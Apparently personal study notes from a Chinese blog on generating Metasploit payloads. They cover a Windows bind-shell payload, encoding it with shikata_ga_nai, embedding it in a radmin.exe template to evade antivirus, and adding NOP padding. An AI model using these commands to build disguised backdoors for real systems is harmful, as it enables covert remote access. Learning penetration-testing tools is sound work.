MSF学习(6)生成payload

六:生成payload

msf5 > use payload/windows/shell_bind_tcp

msf5 payload(windows/shell_bind_tcp) > generate (查看漏洞payload) Payload含有坏字符

msf5 payload(windows/shell_bind_tcp) > generate -h使用编码方式去把坏字符替换掉‘ Msf自动选择编码模块绕过坏字符

msf5 payload(windows/shell_bind_tcp) > show encoders (一般会自动择优)

Eg:

msf5 payload(windows/shell_bind_tcp) > generate -b ‘\x00 手动设置编码方式

msf5 payload(windows/shell_bind_tcp) > show encoders

msf5 payload(windows/shell_bind_tcp) > generate -e x86/shikata_ga_nai

msf5 payload(windows/shell_bind_tcp) > generate -b '\x00' -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o /root/xx.exe(经过编码或者使用模板,可以简单的免杀)

Nop(无任何操作,但可以起到混淆作用)

msf5 payload(windows/shell_bind_tcp) > generate -s 14

msf5 payload(windows/shell_bind_tcp) > generate -t c(C语言的payload) -s 30(nop混淆)

msf5 payload(windows/shell_bind_tcp) > generate -t python(python语言的payload) -s 30(nop混淆)

msf5 payload(windows/shell_bind_tcp) > generate -t java(java语言的payload) -s 30(nop混淆)

posted @ 2020-05-22 10:43  adsry  阅读(760)  评论(0编辑  收藏  举报